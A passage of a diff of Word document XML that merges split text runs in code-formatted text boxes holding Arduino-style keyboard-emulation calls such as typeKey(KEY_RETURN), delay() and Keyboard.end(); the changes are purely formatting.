                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28203,25 +27278,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28255,25 +27312,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28290,25 +27329,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28342,25 +27363,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28377,25 +27380,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28429,25 +27414,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28490,25 +27457,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Keyboard.end(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>);</w:t>
+                        <w:t xml:space="preserve">  Keyboard.end();</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28568,25 +27517,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">void </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>loop(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>) {}</w:t>
+                        <w:t>void loop() {}</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -28673,25 +27604,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28708,18 +27621,8 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
+                              <w:t xml:space="preserve">  delay(</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -28769,25 +27672,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28804,25 +27689,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28856,25 +27723,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28891,25 +27740,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28943,25 +27774,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28978,25 +27791,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29030,25 +27825,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29065,25 +27842,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29117,25 +27876,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29152,25 +27893,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29204,25 +27927,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29265,25 +27970,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Keyboard.end(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>);</w:t>
+                              <w:t xml:space="preserve">  Keyboard.end();</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29353,25 +28040,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29388,18 +28057,8 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
+                        <w:t xml:space="preserve">  delay(</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -29449,25 +28108,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29484,25 +28125,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29536,25 +28159,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29571,25 +28176,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29623,25 +28210,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29658,25 +28227,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29710,25 +28261,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29745,25 +28278,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
